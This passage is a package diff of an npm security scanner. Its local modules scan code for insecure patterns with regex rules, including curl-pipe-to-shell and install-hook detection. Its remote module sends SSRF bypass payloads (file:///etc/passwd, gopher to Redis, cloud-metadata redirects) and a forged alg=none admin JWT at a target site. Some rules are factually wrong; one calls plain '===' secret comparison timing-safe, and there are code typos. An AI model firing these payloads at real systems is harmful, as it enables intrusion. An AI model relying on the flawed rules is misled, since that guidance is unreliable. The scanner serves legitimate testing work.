redgun-security 1.2.0 → 1.4.0

package/src/local/postmessage.js

@@ -0,0 +1,66 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.html', '.htm', '.vue', '.svelte', '.astro'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditPostMessage(projectPath, spinner) {
+  spinner.text = 'Scanning for PostMessage/BroadcastChannel vulnerabilities...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /addEventListener\s*\(\s*['"]message['"]\s*(?!.*\.origin)/gi, name: 'message listener without origin check', severity: 'CRITICAL' },
+        { pattern: /addEventListener\s*\(\s*['"]message['"]\s*,\s*\([^)]*\)\s*=>\s*\{(?!.*origin)/gi, name: 'postMessage handler arrow fn without origin validation', severity: 'CRITICAL' },
+        { pattern: /postMessage\s*\(\s*[^,]*\s*,\s*['"]\*['"]/gi, name: 'postMessage with wildcard targetOrigin *', severity: 'HIGH' },
+        { pattern: /event\.origin\s*\.includes|event\.origin\s*\.endsWith|event\.origin\s*\.startsWith/gi, name: 'origin check using includes/endsWith (substring bypass)', severity: 'HIGH' },
+        { pattern: /event\.origin\s*===\s*['"]https:\/\/[^'"]*['"]/gi, name: 'Strict origin comparison (good)', severity: 'INFO' },
+        { pattern: /eval\s*\(\s*event\.data|innerHTML\s*=\s*event\.data|document\.write\s*\(\s*event\.data/gi, name: 'postMessage data used dangerously', severity: 'CRITICAL' },
+        { pattern: /new\s+BroadcastChannel\s*\(/gi, name: 'BroadcastChannel created (broadcast to all same-origin tabs)', severity: 'MEDIUM' },
+        { pattern: /new\s+MessageChannel\s*\(/gi, name: 'MessageChannel created (check port1/port2 exposure)', severity: 'LOW' },
+        { pattern: /window\.opener\.postMessage|parent\.postMessage|top\.postMessage/gi, name: 'Cross-window postMessage (check origin)', severity: 'MEDIUM' },
+        { pattern: /iframe.*contentWindow\.postMessage|iframe.*\.src/gi, name: 'Iframe postMessage interaction', severity: 'MEDIUM' },
+        { pattern: /window\.open\s*\(\s*['"`].*['"`]\s*\)/gi, name: 'window.open (tabnabbing if no opener policy)', severity: 'LOW' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('//') || line.startsWith('#') || line.startsWith('*')) continue;
+
+          addFinding(
+            severity,
+            'PostMessage / BroadcastChannel',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Always validate event.origin with strict equality. Use a whitelist, not includes/endsWith. Never evaluate event.data as code. Use BroadcastChannel with user validation. For window.open, set opener=null and use noopener/noreferrer.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/service-worker.js

@@ -0,0 +1,64 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.html', '.htm'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditServiceWorker(projectPath, spinner) {
+  spinner.text = 'Scanning for Service Worker abuse vectors...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /navigator\.serviceWorker\.register\s*\(/gi, name: 'Service Worker registration', severity: 'INFO' },
+        { pattern: /importScripts\s*\(/gi, name: 'Service Worker importScripts (XSS via sw)', severity: 'HIGH' },
+        { pattern: /self\.addEventListener\s*\(\s*['"]fetch['"]/gi, name: 'Service Worker fetch listener', severity: 'INFO' },
+        { pattern: /self\.addEventListener\s*\(\s*['"]message['"]/gi, name: 'Service Worker message listener (postMessage attack)', severity: 'MEDIUM' },
+        { pattern: /respondWith\s*\(\s*fetch\s*\(\s*event\.request\s*\)/gi, name: 'SW passthrough fetch (check URL rewriting)', severity: 'MEDIUM' },
+        { pattern: /event\.respondWith\s*\(\s*new\s+Response/gi, name: 'SW custom response (check for content injection)', severity: 'MEDIUM' },
+        { pattern: /CacheStorage|self\.caches\s*\./gi, name: 'Cache API usage (cache poisoning via SW)', severity: 'LOW' },
+        { pattern: /Clients\.claim\s*\(\s*\)|self\.clients\.claim/gi, name: 'Service Worker immediate claim (malicious takeover)', severity: 'HIGH' },
+        { pattern: /self\.skipWaiting/gi, name: 'SW skipWaiting (immediate activation)', severity: 'MEDIUM' },
+        { pattern: /navigator\.serviceWorker\.getRegistration|navigator\.serviceWorker\.controller/gi, name: 'SW control check', severity: 'INFO' },
+        { pattern: /self\.registration\.unregister/gi, name: 'SW unregistration', severity: 'LOW' },
+        { pattern: /PushManager|pushManager\.subscribe|showNotification/gi, name: 'Push notifications (notification spam vector)', severity: 'LOW' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          addFinding(
+            severity,
+            'Service Worker / WebRTC',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${lines[lineNum - 1]?.trim().substring(0, 120)}`,
+            'Restrict Service Worker scope (/). Use importScripts from same-origin only. Validate fetch events to prevent response tampering. Monitor dangerously overwritable headers. Limit Cache API usage to prevent storage exhaustion.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/supply-chain-advanced.js

@@ -0,0 +1,71 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.json', '.lock', '.toml'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditSupplyChainAdvanced(projectPath, spinner) {
+  spinner.text = 'Scanning for supply chain attacks (dep confusion, lockfile, post-install)...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /postinstall|preinstall|postuninstall|prepare|prepublishOnly/gi, name: 'npm lifecycle hook (check for abuse)', severity: 'MEDIUM' },
+        { pattern: /"postinstall"\s*:\s*"([^"]+)"/gi, name: 'postinstall script detected', severity: 'HIGH' },
+        { pattern: /"scripts"\s*:\s*\{[^}]*"(?:install|postinstall|preinstall)"/gi, name: 'Install script in package.json', severity: 'MEDIUM' },
+        { pattern: /(?:eval|exec|child_process|spawn|require)\s*\(\s*['"`][^'"`]*(['"`]\s*\+\s*|['"`]\s*\+\s*['"`])/gi, name: 'Dynamic code execution in scripts', severity: 'CRITICAL' },
+        { pattern: /npm_config_|process\.env\.npm_/gi, name: 'npm config env var usage (can be manipulated)', severity: 'MEDIUM' },
+        { pattern: /(?:registry|publishConfig|_resolved)\s*:\s*"(?!https:\/\/registry\.npmjs\.org)/gi, name: 'Non-standard npm registry configured', severity: 'HIGH' },
+        { pattern: /"dependencies"\s*:\s*\{[^}]*"(?!@[^"]+)":/gi, name: 'Unscoped dependency (dep confusion risk)', severity: 'MEDIUM' },
+        { pattern: /"resolved"\s*:\s*"[^"]*(?:localhost|0\.0\.0\.0|127\.0\.0\.1|evil|hack|malware)/gi, name: 'Suspicious resolved URL in lockfile', severity: 'CRITICAL' },
+        { pattern: /"version"\s*:\s*"0\.0\.\d+|"version"\s*:\s*"file:|\*"resolved"\s*"/gi, name: 'Zero-version or file: dependency (suspicious)', severity: 'HIGH' },
+        { pattern: /gist\.githubusercontent\.com|raw\.githubusercontent\.com.*npm|npm\s*-?\s*i\s*-\s*g\s*http/i, name: 'Package from non-registry source', severity: 'HIGH' },
+        { pattern: /(?:integrity|shasum|sha512|sha1)\s*:\s*""/gi, name: 'Empty integrity hash in lockfile (tampered)', severity: 'CRITICAL' },
+        { pattern: /"hasInstallScript"\s*:\s*true/gi, name: 'Package has install scripts (audit)', severity: 'MEDIUM' },
+        { pattern: /npmrc|\.npmrc.*token|npm.*config.*set.*auth/gi, name: 'npm registry auth config', severity: 'INFO' },
+        { pattern: /(?:pip|pip3|pipx)\s+install\s+[-]+\s*(?!-r)/gi, name: 'pip install without requirements (dep confusion)', severity: 'MEDIUM' },
+        { pattern: /curl\s+.*\|\s*(?:bash|sh|zsh)/gi, name: 'curl pipe to shell (remote code execution risk)', severity: 'CRITICAL' },
+        { pattern: /wget\s+.*\|\s*(?:bash|sh|zsh)/gi, name: 'wget pipe to shell (remote code execution risk)', severity: 'CRITICAL' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('#') || line.startsWith('//')) continue;
+
+          addFinding(
+            severity,
+            'Supply Chain Attacks',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Use scoped packages (@org/pkg) to prevent dependency confusion. Audit postinstall scripts. Verify lockfile integrity. Use npm audit and npm vet. Avoid curl|bash patterns. Pin dependencies with exact versions and verify hashes. Use private registry for internal packages.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/timing.js

@@ -0,0 +1,66 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.py', '.rb', '.php', '.go', '.java'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditTiming(projectPath, spinner) {
+  spinner.text = 'Scanning for timing side-channel vulnerabilities...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /(?:password|secret|token|key|hash|pin).*\s*={2,3}\s*(?:req|request|params|body|input)/gi, name: 'String comparison with user input (timing leak)', severity: 'HIGH' },
+        { pattern: /(?:password|secret|token|key|hash|pin)\s*===\s*/gi, name: 'Strict comparison used (good for timing)', severity: 'INFO' },
+        { pattern: /crypto\.timingSafeEqual|timingsafe\b/gi, name: 'Timing-safe comparison used (good)', severity: 'INFO' },
+        { pattern: /\b(?:sleep|delay|wait|setTimeout|setInterval)\s*\(\s*(?:req|request|params|query|body)/gi, name: 'User-controlled delay/sleep (potential timing oracle)', severity: 'MEDIUM' },
+        { pattern: /(?:if|when)\s*\([^)]*(?:req|request|params|query|body)[^)]*\)\s*(?:\{|\n)\s*(?:sleep|delay|setTimeout)/gi, name: 'Conditional sleep based on user input', severity: 'HIGH' },
+        { pattern: /(?:login|auth|signin).*select.*password.*(?:req|request|params)/gi, name: 'Password DB lookup (check for timing leak on user-not-found)', severity: 'MEDIUM' },
+        { pattern: /bcrypt\.compare|bcrypt\.compareSync|argon2\.verify/gi, name: 'bcrypt/argon2 verification (timing-safe)', severity: 'INFO' },
+        { pattern: /(?:hash|digest|hmac)\s*\(\s*['"]?(?:md5|sha1|sha256|sha512)['"]?\s*,/gi, name: 'Hash function usage (check HMAC timing)', severity: 'LOW' },
+        { pattern: /(?:for|while)\s*\([^)]*(?:req|request|params|query|body)[^)]*\)/gi, name: 'Loop iteration from user input (DoS + timing oracle)', severity: 'MEDIUM' },
+        { pattern: /(?:username|email|user).*exists|(?:findOne|findUser)\s*\(\s*\{.*username/gi, name: 'User existence check (potential oracle)', severity: 'LOW' },
+        { pattern: /PasswordResetListener|SentMessage|mail.*send.*token/gi, name: 'Email sending after reset request (timing oracle on user existence)', severity: 'LOW' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('//') || line.startsWith('#') || line.startsWith('*')) continue;
+
+          addFinding(
+            severity,
+            'Timing Side-Channels',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Use constant-time comparison (timingSafeEqual) for secrets. Ensure login returns identical responses regardless of user existence. Add random jitter to email sending. Never use sleep/delay from user input.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/webauthn.js

@@ -0,0 +1,66 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.py', '.rb', '.php', '.go', '.java'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditWebauthn(projectPath, spinner) {
+  spinner.text = 'Scanning for WebAuthn/Passkeys vulnerabilities...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /navigator\.credentials\.(?:create|get)\s*\(/gi, name: 'WebAuthn credential create/get', severity: 'INFO' },
+        { pattern: /PublicKeyCredential|CredentialCreationOptions/gi, name: 'WebAuthn API usage', severity: 'INFO' },
+        { pattern: /(?:webauthn|passkey|security.?key|biometric).*(?:auth|login|verify|register)/gi, name: 'Passkey/WebAuthn auth flow', severity: 'INFO' },
+        { pattern: /(?:webauthn|passkey).*.*(?:relay|proxy|forward|redirect)/gi, name: 'WebAuthn relay attack surface', severity: 'HIGH' },
+        { pattern: /challenge\s*[:=]\s*['"][a-zA-Z0-9]{1,16}['"]|challenge\s*[:=]\s*Bufffer\.from\s*\(/gi, name: 'Short/static WebAuthn challenge (relay vector)', severity: 'HIGH' },
+        { pattern: /(?:challenge|nonce|serverChallenge).*(?:Math\.random|Date\.now|uuid)/gi, name: 'WebAuthn challenge from predictable source', severity: 'CRITICAL' },
+        { pattern: /allowCredentials\s*:\s*\[\s*\]|allowCredentials\s*:\s*\[\s*\{\s*type\s*:\s*'public-key'\s*\}\s*\]/gi, name: 'WebAuthn empty allowCredentials (allowed all keys)', severity: 'HIGH' },
+        { pattern: /userVerification\s*:\s*['"]discouraged['"]/gi, name: 'WebAuthn user verification discouraged', severity: 'MEDIUM' },
+        { pattern: /attestation\s*:\s*['"]none['"]/gi, name: 'WebAuthn attestation disabled (no device verification)', severity: 'MEDIUM' },
+        { pattern: /rp\.id\s*[:=]\s*['"][^'"]*['"]/gi, name: 'WebAuthn relying party ID', severity: 'INFO' },
+        { pattern: /(?:webauthn|fido2|u2f).*(?:fallback|recovery|backup).*(?:password|sms|email)/gi, name: 'WebAuthn with weak fallback (bypass vector)', severity: 'HIGH' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('//') || line.startsWith('#') || line.startsWith('*')) continue;
+
+          addFinding(
+            severity,
+            'WebAuthn / Passkeys',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Use cryptographically random challenges (32+ bytes). Do not use predictable sources for challenges. Require userVerification for sensitive operations. Implement proper RP ID validation. Do not rely on WebAuthn alone; use as MFA factor.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/local/xpath-ssi.js

@@ -0,0 +1,67 @@
+import { readFileSync, readdirSync, statSync } from 'fs';
+import { join, extname } from 'path';
+import { addFinding } from '../core/findings.js';
+
+const SCAN_EXTENSIONS = ['.js', '.ts', '.jsx', '.tsx', '.py', '.rb', '.php', '.go', '.java'];
+const IGNORE_DIRS = ['node_modules', '.git', 'dist', 'build', '__pycache__', 'vendor'];
+
+export async function auditXpathSsi(projectPath, spinner) {
+  spinner.text = 'Scanning for XPath & SSI injection...';
+  const files = getFiles(projectPath);
+
+  for (const file of files) {
+    try {
+      const content = readFileSync(file, 'utf-8');
+      const relativePath = file.replace(projectPath, '.');
+      const lines = content.split('\n');
+
+      const patterns = [
+        { pattern: /XPath\.evaluate\s*\(\s*(?:req|request|params|query|body|user)/gi, name: 'XPath evaluate with user input', severity: 'CRITICAL' },
+        { pattern: /xpath\.select\s*\(\s*(?:req|request|params|query|body)/gi, name: 'XPath select with user input', severity: 'CRITICAL' },
+        { pattern: /(?:find|query|select)\s*\(\s*['"`]\/\/(?:\w+::)?(\w+)\[.*\$\{/gi, name: 'XPath query with template literal', severity: 'CRITICAL' },
+        { pattern: /(?:find|query|select)\s*\(\s*['"`]\/\/(?:\w+::)?(\w+)\[.*\+/gi, name: 'XPath query with concatenated input', severity: 'CRITICAL' },
+        { pattern: /SimpleXMLElement.*xpath\s*\(\s*\$_(?:GET|POST|REQUEST)/gi, name: 'PHP SimpleXML xpath user input', severity: 'CRITICAL' },
+        { pattern: /DOMXPath.*query\s*\(\s*\$_(?:GET|POST|REQUEST)/gi, name: 'PHP DOMXPath query user input', severity: 'CRITICAL' },
+        { pattern: /xpath\.compile\s*\(\s*(?:req|request|input)/gi, name: 'XPath compile with user input', severity: 'HIGH' },
+        { pattern: /<!--#\s*(?:include|exec|echo|fsize|flastmod|config)/gi, name: 'Server-Side Includes (SSI) in templates', severity: 'HIGH' },
+        { pattern: /<!--#echo\s+var|<!--#include\s+(?:virtual|file)|<!--#exec/gi, name: 'SSI directives in source', severity: 'CRITICAL' },
+        { pattern: /(?:shtml|stm|shtm)/gi, name: 'SSI file extension (.shtml)', severity: 'MEDIUM' },
+        { pattern: /Options\s+\+Includes|AddHandler.*server-parsed/gi, name: 'Apache SSI enabled', severity: 'LOW' },
+        { pattern: /(?:include|exec|echo)\s*\(\s*(?:req|request|params|input)/gi, name: 'Server include with user input', severity: 'CRITICAL' },
+      ];
+
+      for (const { pattern, name, severity } of patterns) {
+        let match;
+        while ((match = pattern.exec(content)) !== null) {
+          const lineNum = content.substring(0, match.index).split('\n').length;
+          const line = lines[lineNum - 1]?.trim() || '';
+          if (line.startsWith('//') || line.startsWith('#') || line.startsWith('*')) continue;
+
+          addFinding(
+            severity,
+            'XPath / SSI Injection',
+            name,
+            `File: ${relativePath}:${lineNum}\nCode: ${line.substring(0, 120)}`,
+            'Use parameterized XPath queries. Sanitize input against special chars (, ), [, ], :, *, /, @, !, =, >, <. Disable SSI unless needed (Options -Includes). Never pass user input to SSI directives.'
+          );
+        }
+      }
+    } catch {}
+  }
+}
+
+function getFiles(dir, files = []) {
+  try {
+    const entries = readdirSync(dir);
+    for (const entry of entries) {
+      if (IGNORE_DIRS.includes(entry) || entry.startsWith('.')) continue;
+      const fullPath = join(dir, entry);
+      try {
+        const stat = statSync(fullPath);
+        if (stat.isDirectory()) getFiles(fullPath, files);
+        else if (SCAN_EXTENSIONS.includes(extname(entry).toLowerCase()) && stat.size < 512 * 1024) files.push(fullPath);
+      } catch {}
+    }
+  } catch {}
+  return files;
+}

package/src/remote/complete.js

@@ -0,0 +1,240 @@
+import { addFinding } from '../core/findings.js';
+import { fetchText, fetchWithTimeout } from '../utils/fetch.js';
+
+export async function scanSsrfBypassChains(origin, spinner) {
+  spinner.text = 'Testing SSRF bypass chains (DNS rebinding, redirect, encoding)...';
+
+  const ssrfParams = ['url', 'link', 'src', 'callback', 'webhook', 'fetch', 'proxy', 'redirect', 'image', 'file', 'path', 'feed'];
+  const bypassPayloads = [
+    { name: 'IPv4 decimal', value: 'http://2130706433/' },
+    { name: 'IPv4 hex', value: 'http://0x7f000001/' },
+    { name: 'IPv4 octal', value: 'http://017700000001/' },
+    { name: 'IPv4 short', value: 'http://127.1/' },
+    { name: 'IPv6 loopback', value: 'http://[::1]/' },
+    { name: 'IPv6 localhost', value: 'http://[0:0:0:0:0:ffff:127.0.0.1]/' },
+    { name: 'DNS rebinding (nip.io)', value: 'http://127.0.0.1.nip.io/' },
+    { name: 'DNS rebinding (xip.io)', value: 'http://127.0.0.1.xip.io/' },
+    { name: 'localhost variants', value: 'http://localhost/' },
+    { name: 'localhost with port', value: 'http://localhost:22/' },
+    { name: '0.0.0.0', value: 'http://0.0.0.0/' },
+    { name: 'Double URL encode', value: 'http://%31%32%37%2e%30%2e%30%2e%31/' },
+    { name: 'Unicode bypass', value: 'http://①②⑦.⓪.⓪.①/' },
+    { name: 'File protocol', value: 'file:///etc/passwd' },
+    { name: 'Gopher protocol', value: 'gopher://127.0.0.1:6379/' },
+    { name: 'Dict protocol', value: 'dict://127.0.0.1:22/' },
+    { name: 'Redirect chain', value: 'http://http-redirector.burpcollaborator.net/redirect?target=http://169.254.169.254/' },
+    { name: 'Short URL', value: 'http://bit.ly/127-0-0-1' },
+  ];
+
+  for (const param of ssrfParams) {
+    for (const { name, value } of bypassPayloads.slice(0, 12)) {
+      try {
+        const resp = await fetchText(`${origin}/?${param}=${encodeURIComponent(value)}`, {}, 8000);
+        if (/root:x:0|ssh-|redis_version|ami-id|instance-id|Connection refused|SSH-|HTTP\/1\.[01]/.test(resp.body)) {
+          addFinding('CRITICAL', 'SSRF Bypass Chains', `SSRF bypass via ${name}: ?${param}=`, `Payload "${value}" returned internal service response`, 'Block all internal IP ranges. Normalize URLs before validation. Use egress rules and DNS-level blocking. Implement ALLOW-listing, not DENY-listing.');
+          return;
+        }
+      } catch {}
+    }
+  }
+}
+
+export async function scanJwtRemoteAdvanced(origin, spinner) {
+  spinner.text = 'Testing JWT advanced attacks (kid, JWK, none, key confusion)...';
+
+  const unprotectedPath = `eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.${btoa(JSON.stringify({ sub: 'admin', role: 'admin', exp: 9999999999 }))}.`;
+
+  const apiPaths = ['/api', '/api/me', '/api/user', '/api/profile', '/api/admin', '/dashboard'];
+
+  for (const path of apiPaths) {
+    try {
+      const resp = await fetchText(`${origin}${path}`, {
+        headers: { Authorization: `Bearer ${unprotectedPath}` },
+      }, 5000);
+
+      if (resp.status === 200) {
+        addFinding('CRITICAL', 'JWT Advanced', 'JWT "none" algorithm accepted', `${origin}${path} accepted unsigned JWT with alg=none`, 'Always enforce strict algorithm validation. Whitelist expected algorithms. Never accept "none" algorithm.');
+        break;
+      } else if (resp.status === 403 || resp.status === 401) {
+        addFinding('INFO', 'JWT Advanced', 'JWT rejected (good) at ' + path, `None algorithm rejected with ${resp.status}`, 'Proper algorithm enforcement detected. Ensure RS256 key confusion vector is also blocked.');
+      }
+    } catch {}
+  }
+
+  try {
+    const resp = await fetchText(`${origin}/.well-known/jwks.json`, {}, 5000);
+    if (resp.status === 200 && resp.body.includes('"keys"')) {
+      addFinding('INFO', 'JWT Advanced', 'JWKS endpoint found at /.well-known/jwks.json', 'JWK Set publicly exposed', 'Review JWKS for single key (private key leak risk). Ensure keys are rotated.');
+    }
+  } catch {}
+}
+
+export async function scanGrpc(origin, spinner) {
+  spinner.text = 'Testing gRPC reflection and endpoints...';
+
+  const grpcEndpoints = ['/grpc.reflection.v1alpha.ServerReflection/ServerReflectionInfo',
+    '/grpc.reflection.v1.ServerReflection/ServerReflectionInfo'];
+
+  for (const endpoint of grpcEndpoints) {
+    try {
+      const resp = await fetchText(`${origin}${endpoint}`, {
+        method: 'POST',
+        headers: { 'Content-Type': 'application/grpc' },
+      }, 5000);
+
+      if (resp.status === 200 || resp.status === 415 || resp.status === 200) {
+        addFinding('MEDIUM', 'gRPC/OpenAPI', `gRPC reflection endpoint reachable: ${endpoint}`, `Server responded with status ${resp.status}`, 'Disable gRPC reflection in production. Use grpcurl to enumerate exposed services. Add authentication to gRPC endpoints.');
+        break;
+      }
+    } catch {}
+  }
+}
+
+export async function scanOpenApi(origin, spinner) {
+  spinner.text = 'Fuzzing OpenAPI/Swagger schemas...';
+
+  const openApiPaths = ['/swagger.json', '/swagger.yaml', '/api-docs', '/openapi.json', '/openapi.yaml',
+    '/v1/openapi.json', '/v2/api-docs', '/v3/api-docs', '/api/openapi.json', '/docs/api', '/swagger-ui.html'];
+
+  for (const path of openApiPaths) {
+    try {
+      const resp = await fetchText(`${origin}${path}`, {}, 5000);
+      if (resp.status === 200 && (resp.body.includes('"openapi"') || resp.body.includes('"swagger"') || resp.body.includes('"paths"') || resp.body.includes('swagger'))) {
+        addFinding('HIGH', 'gRPC/OpenAPI', `OpenAPI/Swagger spec exposed: ${path}`, 'API schema publicly accessible - reveals all endpoints, parameters, and schemas', 'Restrict OpenAPI specs to authenticated internal users. Expose documentation only in dev environment.');
+        break;
+      }
+    } catch {}
+  }
+}
+
+export async function scanWebrtc(origin, spinner) {
+  spinner.text = 'Testing WebRTC IP leakage...';
+
+  try {
+    const resp = await fetchText(origin);
+    if (resp.body.includes('RTCPeerConnection') || resp.body.includes('webkitRTCPeerConnection') || resp.body.includes('iceServers') || resp.body.includes('stun:') || resp.body.includes('turn:')) {
+      addFinding('LOW', 'Service Worker / WebRTC', 'WebRTC usage detected (IP leak risk)', 'ICE/STUN/TURN servers configured in page', 'WebRTC can leak internal IP addresses even behind VPN/proxy. Use WebRTC block extension or disable in browser settings for anonymity.');
+    } else {
+      addFinding('INFO', 'Service Worker / WebRTC', 'WebRTC IP leak check', 'No WebRTC detected on main page', 'Verify subpages and authenticated sections for WebRTC usage that could leak internal IPs.');
+    }
+  } catch {}
+}
+
+export async function scanStoredDomXss(origin, spinner) {
+  spinner.text = 'Automated stored/DOM XSS with browser...';
+
+  try {
+    const resp = await fetchText(origin);
+    const body = resp.body;
+
+    const inputNames = [];
+    const inputPattern = /<input[^>]*name\s*=\s*['"]([^'"]+)['"]/gi;
+    let match;
+    while ((match = inputPattern.exec(body)) !== null) {
+      inputNames.push(match[1]);
+    }
+
+    const textareaPattern = /<textarea[^>]*name\s*=\s*['"]([^'"]+)['"]/gi;
+    while ((match = textareaPattern.exec(body)) !== null) {
+      inputNames.push(match[1]);
+    }
+
+    const commentFields = inputNames.filter(n => /comment|message|body|content|text|description|bio|about|review|feedback/i.test(n));
+    const searchFields = inputNames.filter(n => /search|query|q|keyword|term/i.test(n));
+
+    if (commentFields.length > 0) {
+      addFinding('MEDIUM', 'Stored/DOM XSS', `Stored XSS target: ${commentFields.length} comment/input fields`, `Fields: ${commentFields.join(', ')} - test with <script>, <img onerror>, <svg/onload> payloads`, 'Submit XSS payloads into these fields, then visit the page where content is rendered without sanitization.');
+    }
+
+    if (inputNames.length > 10) {
+      addFinding('INFO', 'Stored/DOM XSS', `${inputNames.length} input fields discovered for XSS testing`, `All fields: ${inputNames.join(', ').substring(0, 200)}`, 'Use browser-automated tools to inject and verify XSS in all input fields. Check for WAF bypass patterns.');
+    }
+
+    const windowEventPattern = /window\.addEventListener\s*\(\s*['"]message['"]/g;
+    if (windowEventPattern.test(body)) {
